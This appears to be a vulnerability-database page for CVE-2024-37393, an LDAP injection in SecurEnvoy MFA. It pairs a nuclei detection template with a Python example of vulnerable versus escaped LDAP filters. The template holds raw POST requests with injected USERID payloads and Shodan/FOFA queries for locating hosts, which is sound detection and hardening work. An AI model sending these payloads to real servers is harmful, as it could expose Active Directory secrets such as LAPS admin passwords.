nuclei / ProjectDiscovery / NUCLEI:CVE-2024-37393
History: Jun 11, 2024 - 10:28 a.m.

SecurEnvoy Two Factor Authentication - LDAP Injection

2024-06-11 10:28:44
ProjectDiscovery
github.com
securenvoy
ldap injection
remote attack
active directory
laps

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

Low

0.013 Low

EPSS

Percentile

86.0%

Multiple LDAP injection vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which holds the cleartext password for the Local Administrator Password Solution (LAPS) feature.

id: CVE-2024-37393
info:
  name: SecurEnvoy Two Factor Authentication - LDAP Injection
  author: securityforeveryone
  severity: critical
  description: |
    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
  reference:
    - https://www.tenable.com/cve/CVE-2024-37393
    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
    - https://securenvoy.com
  metadata:
    verified: true
    shodan-query: title:"SecurEnvoy"
    fofa-query: title="SecurEnvoy"
  tags: cve,cve2024,securenvoy,ldap

variables:
  userid: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:{{userid}})(sAMAccountName=*
        MEMBEROF:Domain Users

      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:*)(sAMAccountName=*
        MEMBEROF:Domain Users

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Error checking Group')"
          - "status_code_1 == 200"
          - "contains(body_2, 'GETPASSCODE')"
          - "status_code_2 == 200"
        condition: and
# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950
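The root cause described above is client-supplied text being concatenated into an LDAP search filter without escaping, so a closing parenthesis in the USERID field terminates the intended assertion and appends attacker-controlled ones. The following Python is an added example written for this page; it is not SecurEnvoy's code, not part of the nuclei template, and the attribute names and filter layout are illustrative assumptions. It shows the vulnerable concatenation beside the hardened form (RFC 4515 escaping plus an allow-list on the field), and uses the template's own USERID payload shape to show that the hardened filter keeps exactly the assertions the application intended.

```python
import re

# RFC 4515 section 3: characters with special meaning inside an LDAP
# filter assertion value, each replaced by a backslash and two hex digits.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value for safe use inside an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


# Allow-list for an account name field (assumption: the application only
# ever expects plain user names here, so anything else is rejected outright).
_USERID_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def is_valid_userid(userid: str) -> bool:
    """Second layer of defence: reject any USERID that is not a plain account name."""
    return _USERID_RE.fullmatch(userid) is not None


def build_user_filter_unsafe(userid: str, group: str) -> str:
    """Vulnerable pattern: raw string interpolation of client-supplied fields.

    The filter shape is a simplified assumption; 'group' is used as a bare
    value here although a real memberOf assertion would carry a DN.
    """
    return f"(&(sAMAccountName={userid})(memberOf={group}))"


def build_user_filter_safe(userid: str, group: str) -> str:
    """Hardened pattern: allow-list the field, then escape every value."""
    if not is_valid_userid(userid):
        raise ValueError("USERID contains characters that are not permitted")
    return (
        f"(&(sAMAccountName={escape_filter_value(userid)})"
        f"(memberOf={escape_filter_value(group)}))"
    )


_ASSERTION_RE = re.compile(r"\(\s*[A-Za-z][\w.-]*\s*=")


def count_assertions(ldap_filter: str) -> int:
    """Count '(attribute=' assertions in a filter string.

    A filter that ends up with more assertions than the code template
    contains is the signature of an injected term.
    """
    return len(_ASSERTION_RE.findall(ldap_filter))


if __name__ == "__main__":
    # Constructed inputs: the payload shape mirrors the USERID field in the
    # nuclei template above; the group value is a placeholder.
    payload = "abc)(sAMAccountName=*"
    group = "Domain Users"

    unsafe = build_user_filter_unsafe(payload, group)
    print("unsafe:", unsafe, "->", count_assertions(unsafe), "assertions")

    # With escaping alone the injected ')(' and '*' become literal bytes.
    print("escaped value:", escape_filter_value(payload))

    # With the allow-list in front, the request is rejected before any
    # filter is built.
    try:
        build_user_filter_safe(payload, group)
    except ValueError as exc:
        print("safe:", exc)

    print("safe:", build_user_filter_safe("jdoe", group))
```

The two layers are deliberately independent: escaping makes any value safe to embed, and the allow-list shrinks the accepted input to what the field is actually for. On the detection side, the same `count_assertions` idea applies to LDAP query logging on the directory: a filter with more `(attribute=` terms than the application's template ever emits, or a `sAMAccountName=*` term arriving from an application that only ever looks up named accounts, is worth an alert.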
